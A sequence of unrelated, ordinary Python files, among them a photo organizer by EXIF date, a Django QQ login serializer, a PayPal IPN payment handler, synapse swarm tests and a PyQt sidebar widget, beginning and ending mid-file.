is_wrong_password = not user.check_password(password)
if is_wrong_password:
raise LoginException('パスワードが間違っています')
login_user(user, remember=remember)
|
import sys
import exifread
import os
from datetime import datetime
import shutil
import filecmp
import logging
logger = logging.getLogger(__name__)
class Operation(object):
def __init__(self, func, desc):
self.func = func
self.desc = desc
def _valid_operations():
ops = dict(
copy=Operation(shutil.copy, 'Copying'),
move=Operation(shutil.move, 'Moving'),
)
if hasattr(os, 'link'):
ops['hardlink'] = Operation(os.link, 'Hardlinking')
return ops
OPERATIONS = _valid_operations()
def process_images(inputdir, outputdir, operation, dry_run=False):
_validate_directories(inputdir, outputdir)
# Create destination directory if not present
if not os.path.isdir(outputdir):
os.makedirs(outputdir)
for imagepath in _get_images(inputdir):
destdir = os.path.join(outputdir,
_get_destdir(imagepath))
if not os.path.isdir(destdir):
logger.info("Creating directory %s", destdir)
_execute(dry_run, os.makedirs, destdir)
destpath = _get_valid_destpath(imagepath, destdir)
if destpath:
logger.info("%s %s to %s", operation.desc, imagepath, destpath)
try:
_execute(dry_run, operation.func, imagepath, destpath)
except OSError:
logger.exception('Could not perform operation.')
sys.exit(1)
def _get_images(path):
for root, _, files in os.walk(path):
for f in files:
if os.path.splitext(f)[1].lower() in ('.jpg', '.jpeg', '.tiff'):
yield os.path.join(root, f)
def _validate_directories(src, dest):
if not os.path.isdir(src):
raise IOError('{} is not a directory.'.format(src))
if _is_subdir(src, dest):
raise SubdirError("{0} is subdirectory of {1}".format(src, dest))
if _is_subdir(dest, src):
raise SubdirError("{0} is subdirectory of {1}".format(dest, src))
def _execute(dry_run, func, *args):
if not dry_run:
func(*args)
def _is_subdir(dir1, dir2):
"""Check if p1 is subdir of p2."""
r1 = os.path.realpath(dir1)
r2 = os.path.realpath(dir2)
if r1.startswith(r2):
return True
return False
def _get_valid_destpath(srcpath, destdir):
p = os.path.join(destdir, os.path.basename(srcpath))
n = 1
while os.path.exists(p):
if filecmp.cmp(srcpath, p, shallow=False):
logger.info("Ignoring identical files: %s %s",
srcpath, p)
p = None
break
base, ext = os.path.splitext(p)
base = "{0}-{1}".format(base, n)
p = ''.join([base, ext])
n += 1
return p
def _get_destdir(image_path):
TAG = 'EXIF DateTimeOriginal'
with open(image_path, 'rb') as image:
tags = exifread.process_file(
image,
stop_tag=TAG,
details=False)
try:
d = _date_path(datetime.strptime(str(tags[TAG]),
"%Y:%m:%d %H:%M:%S"))
except (KeyError, ValueError):
d = 'unknown'
return d
def _date_path(date):
return os.path.join(
str(date.year),
"{0}_{1:02d}_{2:02d}".format(date.year, date.month, date.day))
class SubdirError(Exception):
pass
def main():
logging.basicConfig(level=logging.INFO)
import argparse
parser = argparse.ArgumentParser(
description='Organize image files by date taken.')
parser.add_argument('operation', choices=[name for name in OPERATIONS],
help='file operation')
parser.add_argument('inputdir', type=str, help='input directory')
parser.add_argument('outputdir', type=str, help='output directory')
parser.add_argument('--dry-run', action='store_true',
help="log actions without writing anything to disk")
args = parser.parse_args()
op = OPERATIONS[args.operation]
process_images(args.inputdir, args.outputdir, op, dry_run=args.dry_run)
|
from rest_framework import serializers
from django_redis import get_redis_connection
from users.models import User
from .models import OAuthQQUser
from users.constants import MOBILE_REGEX
class OAuthQQUserSerializer(serializers.ModelSerializer):
"""
保存QQ用户序列化器
"""
sms_code = serializers.CharField(label="短信验证码", help_text="短信验证码", min_length=6, max_length=6, write_only=True)
access_token = serializers.CharField(label="操作凭证", help_text="操作凭证", write_only=True)
token = serializers.CharField(label="登录token", help_text="登录token", read_only=True)
mobile = serializers.RegexField(label="手机号", help_text="手机号",
regex=MOBILE_REGEX)
class Meta:
model = User
fields = ['id', 'username', 'token', 'sms_code', 'access_token', 'mobile', 'password']
extra_kwargs = {
'id': {
'read_only': True
},
'username': {
'read_only': True
},
'password': {
'write_only': True,
'min_length': 8,
'max_length': 20,
'error_messages': {
'min_length': '仅允许8-20个字符的密码',
'max_length': '仅允许8-20个字符的密码',
}
},
}
def validate(self, attrs):
"""
校验函数
:param attrs:
:return:
"""
# 检验access_token
access_token = attrs['access_token']
openid = OAuthQQUser.check_save_user_token(access_token)
if not openid:
raise serializers.ValidationError("无效的access_token")
attrs['openid'] = openid
# 检验短信验证码
mobile = attrs['mobile']
sms_code = attrs['sms_code']
redis_conn = get_redis_connection('verify_codes')
real_sms_code = redis_conn.get('sms_%s' % mobile)
if real_sms_code.decode() != sms_code:
raise serializers.ValidationError('短信验证码错误')
# 检验用户是否存在
try:
user = User.objects.get(mobile=mobile)
except User.DoesNotExist:
# 用户不存在
pass
else:
# 用户已存在,需要校验密码
password = attrs['password']
if not user.check_password(password):
raise serializers.ValidationError("密码错误")
# 校验成功保存uesr
attrs['user'] = user
return attrs
def create(self, validated_data):
# 获取openid
openid = validated_data['openid']
mobile = validated_data['mobile']
password = validated_data['password']
# 尝试获取user
user = validated_data.get('user')
if not user:
# 用户不存在,先创建用户
user = User.objects.create_user(username=mobile, mobile=mobile, password=password)
# 用户存在,创建QQ用户与美多用户的绑定关系
OAuthQQUser.objects.create(user=user, openid=openid)
# 向视图对象中补充user对象属性,以便在视图中使用user
self.context['view'].user = user
return user
|
import json
import pickle
import numpy as np
from flask import Flask
from flask import request
app = Flask(__name__)
with open("clf.pkl", "rb") as f:
clf = pickle.load(f)
def __process_input(request_data: str) -> np.array:
return np.array(np.asarray(json.loads(request.data)["data"]))
# Creating route for model prediction
@app.route("/predict", methods=["POST"])
def predict() -> str:
input_params = __process_input(request.data)
if request.method == "POST":
try:
prediction = clf.predict(input_params)
return json.dumps({"predicted_price ($1000s)": list(prediction.tolist())})
except:
return json.dumps({"error": "PREDICTION FAILED"}), 400
|
import os
from app import bot_app
from app.master.views import app_blueprint
bot_app.blueprint(app_blueprint)
if __name__ == "__main__":
bot_app.run(
host='0.0.0.0',
port=int(os.environ.get('PORT', 8000)),
workers=int(os.environ.get('WEB_CONCURRENCY', 1)),
debug=bool(os.environ.get('DEBUG', ''))
)
|
import numpy as np
from numpy.random import uniform
from enum import Enum
class SampleMethod(Enum):
random_uniform = 0
deterministic_uniform = 1
class Sampler:
def __init__(self):
self.halton_sampler: HaltonSampler = None
def sample(self, num_samples: int, sample_dim: int, method: SampleMethod):
if method == SampleMethod.random_uniform:
return np.random.rand(num_samples, sample_dim)
elif method == SampleMethod.deterministic_uniform:
if self.halton_sampler is None:
self.halton_sampler = HaltonSampler(sample_dim)
# make sure an existing sampler has the correct dimension
assert self.halton_sampler.dim == sample_dim
return self.halton_sampler.get_samples(num_samples)
else:
raise NotImplementedError(f"Unkown sampling method: {method}")
def vdc(n, base=2):
""" Create van der Corput sequence
source for van der Corput and Halton sampling code
https://laszukdawid.com/2017/02/04/halton-sequence-in-python/
"""
vdc, denom = 0, 1
while n:
denom *= base
n, remainder = divmod(n, base)
vdc += remainder / denom
return vdc
def next_prime():
def is_prime(num):
"Checks if num is a prime value"
for i in range(2, int(num ** 0.5) + 1):
if (num % i) == 0:
return False
return True
prime = 3
while 1:
if is_prime(prime):
yield prime
prime += 2
class HaltonSampler:
def __init__(self, dim):
self.dim = dim
# setup primes for every dimension
prime_factory = next_prime()
self.primes = []
for _ in range(dim):
self.primes.append(next(prime_factory))
# init counter for van der Corput sampling
self.cnt = 1
def get_samples(self, n):
seq = []
for d in range(self.dim):
base = self.primes[d]
seq.append([vdc(i, base) for i in range(self.cnt, self.cnt + n)])
self.cnt += n
return np.array(seq).T
|
"""
Payment module for PayPal integration
Needs the following settings to work correctly::
PAYPAL = {
'BUSINESS': 'yourbusiness@paypal.com',
'LIVE': True, # Or False
}
"""
from decimal import Decimal
import logging
import urllib
from django.conf import settings
from django.http import HttpResponse, HttpResponseForbidden
from django.utils import timezone
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_exempt
from plata.payment.modules.base import ProcessorBase
from plata.shop.models import OrderPayment
import plata
logger = logging.getLogger('plata.payment.paypal')
csrf_exempt_m = method_decorator(csrf_exempt)
class PaymentProcessor(ProcessorBase):
key = 'paypal'
default_name = _('Paypal')
def get_urls(self):
from django.conf.urls import patterns, url
return patterns('',
url(r'^payment/paypal/ipn/$', self.ipn, name='plata_payment_paypal_ipn'),
)
def process_order_confirmed(self, request, order):
PAYPAL = settings.PAYPAL
if not order.balance_remaining:
return self.already_paid(order)
logger.info('Processing order %s using Paypal' % order)
payment = self.create_pending_payment(order)
if plata.settings.PLATA_STOCK_TRACKING:
StockTransaction = plata.stock_model()
self.create_transactions(order, _('payment process reservation'),
type=StockTransaction.PAYMENT_PROCESS_RESERVATION,
negative=True, payment=payment)
if PAYPAL['LIVE']:
PP_URL = "https://www.paypal.com/cgi-bin/webscr"
else:
PP_URL = "https://www.sandbox.paypal.com/cgi-bin/webscr"
return self.shop.render(request, 'payment/paypal_form.html', {
'order': order,
'payment': payment,
'HTTP_HOST': request.META.get('HTTP_HOST'),
'post_url': PP_URL,
'business': PAYPAL['BUSINESS'],
})
@csrf_exempt_m
def ipn(self, request):
request.encoding = 'windows-1252'
PAYPAL = settings.PAYPAL
if PAYPAL['LIVE']:
PP_URL = "https://www.paypal.com/cgi-bin/webscr"
else:
PP_URL = "https://www.sandbox.paypal.com/cgi-bin/webscr"
parameters = None
try:
parameters = request.POST.copy()
parameters_repr = repr(parameters).encode('utf-8')
if parameters:
logger.info('IPN: Processing request data %s' % parameters_repr)
postparams = {'cmd': '_notify-validate'}
for k, v in parameters.iteritems():
postparams[k] = v.encode('windows-1252')
status = urllib.urlopen(PP_URL, urllib.urlencode(postparams)).read()
if not status == "VERIFIED":
logger.error('IPN: Received status %s, could not verify parameters %s' % (
status, parameters_repr))
parameters = None
if parameters:
logger.info('IPN: Verified request %s' % parameters_repr)
reference = parameters['txn_id']
invoice_id = parameters['invoice']
currency = parameters['mc_currency']
amount = parameters['mc_gross']
try:
order, order_id, payment_id = invoice_id.split('-')
except ValueError:
logger.error('IPN: Error getting order for %s' % invoice_id)
return HttpResponseForbidden('Malformed order ID')
try:
order = self.shop.order_model.objects.get(pk=order_id)
except self.shop.order_model.DoesNotExist:
logger.error('IPN: Order %s does not exist' % order_id)
return HttpResponseForbidden('Order %s does not exist' % order_id)
try:
payment = order.payments.get(pk=payment_id)
except order.payments.model.DoesNotExist:
payment = order.payments.model(
order=order,
payment_module=u'%s' % self.name,
)
payment.status = OrderPayment.PROCESSED
payment.currency = currency
payment.amount = Decimal(amount)
payment.data = request.POST.copy()
payment.transaction_id = reference
payment.payment_method = payment.payment_module
if parameters['payment_status'] == 'Completed':
payment.authorized = timezone.now()
payment.status = OrderPayment.AUTHORIZED
payment.save()
order = order.reload()
logger.info('IPN: Successfully processed IPN request for %s' % order)
if payment.authorized and plata.settings.PLATA_STOCK_TRACKING:
StockTransaction = plata.stock_model()
self.create_transactions(order, _('sale'),
type=StockTransaction.SALE, negative=True, payment=payment)
if not order.balance_remaining:
self.order_paid(order, payment=payment)
return HttpResponse("Ok")
except Exception, e:
logger.error('IPN: Processing failure %s' % unicode(e))
raise
|
# Django settings for testapp project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = '58_c#ha*osgvo(809%#@kf!4_ab((a4tl6ypa_0i_teh&%dul$'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
#'django.core.context_processors.tz',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'plata.context_processors.plata_context',
)
ROOT_URLCONF = 'testapp.urls'
WSGI_APPLICATION = 'testapp.wsgi.application'
TEMPLATE_DIRS = (
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'testapp',
'plata',
'plata.contact', # Not strictly required (contact model can be exchanged)
'plata.discount',
'plata.payment',
'plata.product', # Does nothing
'plata.product.stock', # Accurate stock tracking, not required
'plata.shop',
)
PLATA_SHOP_PRODUCT = 'testapp.Product'
PLATA_STOCK_TRACKING = True
POSTFINANCE = {
'PSPID': 'plataTEST',
'SHA1_IN': 'plataSHA1_IN',
'SHA1_OUT': 'plataSHA1_OUT',
'LIVE': False,
}
PAYPAL = {
'BUSINESS': 'example@paypal.com',
'LIVE': False,
}
|
import math
import random
import discord
TIPS = [
"Tip: The shopstats command shows how many items have been purchased!",
"Tip: The shoplb command shows the shop leaderboard for the server!",
"Tip: The rshoplist command shows an overview of all RCON shop categories and items!",
"Tip: The dshoplist command shows an overview of all DATA shop categories and items!",
"Tip: The playershopstats command shows shop stats for a particular member, or yourself!",
"Tip: You can use the playerstats command to view playtime stats for a specific player, or yourself!",
"Tip: You can use the clusterstats command to view the top player on each cluster!",
"Tip: You can use the arklb command to view a global playtime leaderboard for all maps!",
"Tip: You can use the servergraph command to view player count over time!",
]
SHOP_ICON = "https://i.imgur.com/iYpszMO.jpg"
SELECTORS = ["1️⃣", "2️⃣", "3️⃣", "4️⃣"]
REACTIONS = ["↩️", "◀️", "❌", "▶️", "1️⃣", "2️⃣", "3️⃣", "4️⃣"]
async def shop_stats(logs: dict):
shop_logs = {}
for item in logs["items"]:
count = logs["items"][item]["count"]
shop_logs[item] = count
sorted_items = sorted(shop_logs.items(), key=lambda x: x[1], reverse=True)
pages = math.ceil(len(sorted_items) / 10)
embeds = []
start = 0
stop = 10
for page in range(int(pages)):
if stop > len(sorted_items):
stop = len(sorted_items)
items = ""
for i in range(start, stop, 1):
name = sorted_items[i][0]
purchases = sorted_items[i][1]
items += f"**{name}**: `{purchases} purchased`\n"
embed = discord.Embed(
title="Item Purchases",
description=items
)
embed.set_footer(text=f"Pages: {page + 1}/{pages}\n{random.choice(TIPS)}")
embeds.append(embed)
start += 10
stop += 10
return embeds
async def dlist(shops: dict):
embeds = []
for category in shops:
category_items = ""
for item in shops[category]:
if shops[category][item]["options"] == {}:
price = shops[category][item]["price"]
category_items += f"🔸 {item}: `{price}`\n"
else:
category_items += f"🔸 {item}\n```py\n"
for k, v in shops[category][item]["options"].items():
price = v
option = k
category_items += f"• {option}: {price}\n"
category_items += "```"
embed = discord.Embed(
title=f"🔰 {category}",
description=f"{category_items}"
)
embeds.append(embed)
return embeds
async def rlist(shops):
embeds = []
for category in shops:
category_items = ""
for item in shops[category]:
if "options" in shops[category][item]:
if shops[category][item]["options"] == {}:
price = shops[category][item]["price"]
category_items += f"🔸 {item}: `{price}`\n"
else:
category_items += f"🔸 {item}\n```py\n"
for k, v in shops[category][item]["options"].items():
price = v["price"]
option = k
category_items += f"• {option}: {price}\n"
category_items += "```"
embed = discord.Embed(
title=f"🔰 {category}",
description=f"{category_items}"
)
embeds.append(embed)
return embeds
|
import time
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.telepath as s_telepath
import synapse.lib.service as s_service
import synapse.swarm.runtime as s_runtime
from synapse.tests.common import *
class SwarmRunBase(SynTest):
def getSwarmEnv(self):
tenv = TstEnv()
core0 = s_cortex.openurl('ram://')
core1 = s_cortex.openurl('ram://')
self.addTstForms(core0)
self.addTstForms(core1)
tenv.add('core0', core0, fini=True)
tenv.add('core1', core1, fini=True)
tufo0 = core0.formTufoByProp('strform', 'baz', foo='visi')
tufo1 = core0.formTufoByProp('strform', 'faz', foo='visi')
tufo2 = core1.formTufoByProp('strform', 'lol', foo='visi')
tufo3 = core1.formTufoByProp('strform', 'hai', foo='visi')
tufo4 = core0.formTufoByProp('intform', 10, foo='visi')
tufo5 = core1.formTufoByProp('intform', 12, foo='romp')
tenv.add('tufo0', tufo0)
tenv.add('tufo1', tufo1)
tenv.add('tufo2', tufo2)
tenv.add('tufo3', tufo3)
dmon = s_daemon.Daemon()
link = dmon.listen('tcp://127.0.0.1:0')
tenv.add('link', link)
tenv.add('dmon', dmon, fini=True)
port = link[1].get('port')
svcbus = s_service.SvcBus()
tenv.add('svcbus', svcbus, fini=True)
dmon.share('syn.svcbus', svcbus)
svcrmi = s_telepath.openurl('tcp://127.0.0.1/syn.svcbus', port=port)
tenv.add('svcrmi', svcrmi, fini=True)
s_service.runSynSvc('cortex', core0, svcrmi, tags=('hehe.haha',))
s_service.runSynSvc('cortex', core1, svcrmi, tags=('hehe.hoho',))
runt = s_runtime.Runtime(svcrmi)
tenv.add('runt', runt, fini=True)
return tenv
class SwarmRunTest(SwarmRunBase):
def test_swarm_runtime_eq(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('strform="baz"')
data = answ.get('data')
self.eq(data[0][0], tenv.tufo0[0])
# FIXME check for other expected results info!
answ = tenv.runt.ask('strform:foo')
data = answ.get('data')
self.eq(len(data), 4)
answ = tenv.runt.ask('hehe.haha/strform:foo')
data = answ.get('data')
self.eq(len(data), 2)
answ = tenv.runt.ask('hehe.haha/strform:foo="visi"')
data = answ.get('data')
self.eq(len(data), 2)
tenv.fini()
def test_swarm_runtime_pivot(self):
tenv = self.getSwarmEnv()
data = tenv.runt.eval('strform="baz" strform:foo->strform:foo')
self.eq(len(data), 4)
tenv.fini()
def test_swarm_runtime_opts(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('%foo')
self.eq(answ['options'].get('foo'), 1)
answ = tenv.runt.ask('opts(foo=10)')
self.eq(answ['options'].get('foo'), 10)
answ = tenv.runt.ask('%foo=10')
self.eq(answ['options'].get('foo'), 10)
answ = tenv.runt.ask('opts(foo="bar")')
self.eq(answ['options'].get('foo'), 'bar')
answ = tenv.runt.ask('%foo="bar"')
self.eq(answ['options'].get('foo'), 'bar')
tenv.fini()
def test_swarm_runtime_opts_uniq(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('%uniq strform="baz" strform="baz"')
self.eq(len(answ['data']), 1)
answ = tenv.runt.ask('%uniq=0 strform="baz" strform="baz"')
self.eq(len(answ['data']), 2)
tenv.fini()
def test_swarm_runtime_join(self):
tenv = self.getSwarmEnv()
answ = tenv.runt.ask('strform="baz" join("strform:foo")')
data = answ.get('data')
self.eq(len(data), 4)
answ = tenv.runt.ask('strform="baz" join("intform:foo","strform:foo")')
data = answ.get('data')
self.eq(len(data), 2)
tenv.fini()
def test_swarm_runtime_gele(self):
env = self.getSwarmEnv()
answ = env.runt.ask('intform>=11')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 12)
answ = env.runt.ask('intform>10')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 12)
answ = env.runt.ask('intform>=10')
data = answ.get('data')
self.eq(len(data), 2)
answ = env.runt.ask('intform<=11')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 10)
answ = env.runt.ask('intform<12')
data = answ.get('data')
self.eq(len(data), 1)
self.eq(data[0][1].get('intform'), 10)
answ = env.runt.ask('intform<=13')
data = answ.get('data')
self.eq(len(data), 2)
answ = env.runt.ask('intform -intform<=11')
data = answ.get('data')
self.eq(len(data), 1)
env.fini()
def test_swarm_runtime_regex(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform +strform~="^l"')
data = answ.get('data')
self.eq(data[0][1].get('strform'), 'lol')
answ = env.runt.ask('strform +strform~="^Q"')
self.eq(len(answ.get('data')), 0)
answ = env.runt.ask('strform +strform~="^Q"')
self.eq(len(answ.get('data')), 0)
answ = env.runt.ask('strform -strform~="^[a-z]{3}$"')
self.eq(len(answ.get('data')), 0)
env.fini()
def test_swarm_runtime_or(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform +strform="baz"|strform="faz"')
tufos = answ.get('data')
foobars = sorted([t[1].get('strform') for t in tufos])
self.eq(foobars, ['baz', 'faz'])
env.fini()
def test_swarm_runtime_and(self):
with self.getSwarmEnv() as env:
answ = env.runt.ask('strform -strform="baz" & strform:foo="newp" ')
tufos = answ.get('data')
foobars = sorted([t[1].get('strform') for t in tufos])
self.eq(foobars, ['baz', 'faz', 'hai', 'lol'])
def test_swarm_runtime_clear(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform clear()')
tufos = answ.get('data')
self.eq(len(tufos), 0)
env.fini()
def test_swarm_runtime_saveload(self):
env = self.getSwarmEnv()
answ = env.runt.ask('strform="baz" save("woot") clear() load("woot")')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('strform'), 'baz')
env.fini()
def test_swarm_runtime_has(self):
env = self.getSwarmEnv()
# use the lift code for has()
answ = env.runt.ask('strform')
tufos = answ.get('data')
self.eq(len(tufos), 4)
self.eq(tufos[0][1].get('tufo:form'), 'strform')
# use the filter code for has()
answ = env.runt.ask('tufo:form +strform')
tufos = answ.get('data')
self.eq(len(tufos), 4)
self.eq(tufos[0][1].get('tufo:form'), 'strform')
env.fini()
def test_swarm_runtime_maxtime(self):
env = self.getSwarmEnv()
self.raises(HitStormLimit, env.runt.eval, 'strform', timeout=0)
env.fini()
def test_swarm_runtime_by(self):
env = self.getSwarmEnv()
answ = env.runt.ask('intform*range=(10,13)')
tufos = answ.get('data')
self.eq(len(tufos), 2)
answ = env.runt.ask('intform*range=(10,12)')
tufos = answ.get('data')
self.eq(len(tufos), 1)
answ = env.runt.ask('intform^1*range=(10,13)')
tufos = answ.get('data')
self.eq(len(tufos), 2)
env.fini()
def test_swarm_runtime_frob(self):
env = self.getSwarmEnv()
env.core0.formTufoByProp('inet:ipv4', 0x01020304)
answ = env.runt.ask('inet:ipv4="1.2.3.4"')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('inet:ipv4'), 0x01020304)
answ = env.runt.ask('inet:ipv4=0x01020304')
tufos = answ.get('data')
self.eq(len(tufos), 1)
self.eq(tufos[0][1].get('inet:ipv4'), 0x01020304)
env.fini()
|
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
RANDOM_STATE = 1
def main():
# prepare data
iris = load_iris()
df = pd.DataFrame(iris.data)
col_names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
df.columns = col_names
df['target'] = iris.target
# split train and test
df_train, df_test = train_test_split(df,
test_size=0.3,
random_state=RANDOM_STATE,
stratify=df['target'])
# set index
df_train = df_train.reset_index(drop=True).reset_index()
df_test = df_test.reset_index(drop=True).reset_index()
df_test['index'] = df_test['index'] + len(df_train)
# save data
df_train.to_csv('../data/input/train.csv', index=False)
df_test.to_csv('../data/input/test.csv', index=False)
return None
if __name__ == '__main__':
main()
|
import argparse
import os
from generators.atm_gen import AtmGen
from generators.client_apache_gen import ClientApacheGen
from generators.generator import LogGenerator
from generators.main_apache_gen import MainApacheGen
from generators.main_firewall_gen import MainFirewallGen
log_out = './../test_logs'
if __name__ == '__main__':
parser = argparse.ArgumentParser(__file__, description="Log generator")
parser.add_argument('-sleep', '-s', help='Sleep this between lines (in seconds)', default=0.5, type=float)
args = parser.parse_args()
file_firewall = log_out + '/firewall/firewall.log'
file_apache = log_out + '/apache/apache.log'
file_app = log_out + '/application/app.log'
file_linux = log_out + '/linux/linux.log'
file_atm = log_out + '/atm/atm.log'
file_apache_main = log_out + '/apache-main/apache-main.log'
output_files = [file_apache, file_app, file_firewall, file_linux]
print("Generator started")
# print("Output locations {}", output_files)
lg = LogGenerator(sleep=args.sleep)
# lg.add_generator(FirewallGenerator(file_firewall))
# lg.add_generator(ApacheGenerator(file_apache))
# lg.add_generator(AppGenerator(file_app))
# lg.add_generator(LinuxGenerator(file_linux))
lg.add_generator(ClientApacheGen(file_apache))
lg.add_generator(MainFirewallGen(file_firewall))
lg.add_generator(AtmGen(file_atm))
lg.add_generator(MainApacheGen(file_apache_main))
try:
lg.generate()
except KeyboardInterrupt:
print("Program stop deleting log files")
for file in output_files:
if os.path.exists(file):
os.remove(file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from flask import Flask, request, Response, render_template
import msgpack
app = Flask(__name__, static_folder='assets')
def header_check(f):
@wraps(f)
def decorated(*args, **kwargs):
if not 'application/x-msgpack' in request.headers['Content-Type']:
return Response(u'( ゚д゚)帰れ', status=400)
return f(*args, **kwargs)
return decorated
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api', methods=['GET'])
# @header_check
def api_index():
packed = msgpack.packb(u":( ゙゚'ω゚'):ウウウオオオアアアーーー!!!")
return Response(packed, content_type="application/x-msgpack", status=200)
@app.route('/api', methods=['POST'])
@header_check
def api_create():
data = request.data
print msgpack.unpackb(data)
return Response('yes', status=200)
if __name__ == '__main__':
app.run(debug=True)
|
import logging
import numpy as np
from depth.models import Sequential
from depth.layers import DenseLayer
from depth.loss_functions import mean_squared_error
def main():
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG)
number_of_samples = 50
input_data_dimension = 10
output_data_dimension = 3
nn_object = Sequential()
nn_object.add_layer(DenseLayer(
units=32, activation="relu", input_dimension=input_data_dimension))
nn_object.add_layer(DenseLayer(units=64))
nn_object.add_layer(DenseLayer(units=output_data_dimension,
activation="linear"))
nn_object.compile(loss="mean_squared_error", error_threshold=0.001)
input_data = -0.5 + np.random.rand(input_data_dimension, number_of_samples)
output_data = np.random.rand(output_data_dimension, number_of_samples)
nn_object.train(input_data, output_data)
predicted_values = nn_object.predict(input_data)
print("Mean Squared Error: {}".format(mean_squared_error(
predicted_values, output_data)))
if __name__ == "__main__":
main()
|
# 侧边栏
from PyQt6 import QtCore
from PyQt6.QtCore import QSize
from PyQt6.QtGui import QColor, QIcon
from PyQt6.QtWidgets import QFrame, QGraphicsDropShadowEffect, QPushButton, QVBoxLayout
from .component.Font import Font
from .Account import Account
class Side(QFrame):
def __init__(self, inform, *args):
super().__init__(*args)
# inform负责通知父亲选项切换
self.inform = inform
self.initUI()
def initUI(self):
userButton = QPushButton()
downloadButton = QPushButton(" 下载")
viewButton = QPushButton(" 查看")
aboutButton = QPushButton(" 关于")
settingButton = QPushButton(" 设置")
# 将所有的按键对象全部存储在本对象中
self.buttonList = [userButton, downloadButton, viewButton, settingButton, aboutButton]
# 设置为checkable模式
downloadButton.setCheckable(True)
viewButton.setCheckable(True)
settingButton.setCheckable(True)
userButton.setCheckable(True)
aboutButton.setCheckable(True)
# 设置图标
settingIcon = QIcon("icons/setting.svg")
settingButton.setIcon(settingIcon)
downloadIcon = QIcon("icons/download.svg")
downloadButton.setIcon(downloadIcon)
viewIcon = QIcon("icons/view.svg")
viewButton.setIcon(viewIcon)
aboutIcon = QIcon("icons/about.svg")
aboutButton.setIcon(aboutIcon)
# userButton单独设置固定高度
userButton.setFixedHeight(80)
# 设置布局
vbox = QVBoxLayout()
for button in self.buttonList:
vbox.addWidget(button)
vbox.addStretch(1)
vbox.setSpacing(0)
self.setLayout(vbox)
# 布局更改
vbox.setContentsMargins(0, 0, 0, 0)
self.setContentsMargins(0, 0, 0, 0)
# 设置每个按钮的点击事件
for button in self.buttonList:
button.clicked[bool].connect(self.pressButton)
# 设置style
buttonStyle = """
QPushButton {
padding-top: 10px;
padding-bottom: 10px;
background-color: rgb(245, 245, 245);
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: rgb(220, 220, 220);
border: none;
}
QPushButton:hover {
background-color: rgb(230, 230, 230);
}
QPushButton:checked {
background-color: rgb(220, 220, 220);
}
"""
downloadButton.setStyleSheet(buttonStyle)
viewButton.setStyleSheet(buttonStyle)
settingButton.setStyleSheet(buttonStyle)
userButton.setStyleSheet(buttonStyle)
aboutButton.setStyleSheet(buttonStyle)
downloadButton.setFont(Font.LEVEL3)
viewButton.setFont(Font.LEVEL3)
settingButton.setFont(Font.LEVEL3)
userButton.setFont(Font.LEVEL3)
aboutButton.setFont(Font.LEVEL3)
downloadButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
viewButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
settingButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
userButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
aboutButton.setCursor(QtCore.Qt.CursorShape.PointingHandCursor)
self.setStyleSheet(
"""
QFrame {
background-color: rgb(245, 245, 245);
}
"""
)
qds = QGraphicsDropShadowEffect()
qds.setOffset(0, 0)
qds.setColor(QColor(200, 200, 200))
qds.setBlurRadius(15)
self.setGraphicsEffect(qds)
# self.raise_()
def pressButton(self, val):
pressObj = self.sender()
if not val:
pressObj.setChecked(True)
else:
if self.inform(self.buttonList.index(pressObj)):
for button in self.buttonList:
if button != pressObj:
button.setChecked(False)
pressObj.setChecked(True)
else:
pressObj.setChecked(False)
# 点击val编号的按钮从而切换视图
def changeView(self, val):
if val >= len(self.buttonList) or val < 0:
return
self.buttonList[val].click()
# 更改状态
def stateChange(self, state):
if state == Account.State.NONE or state == Account.State.UNKNOWN:
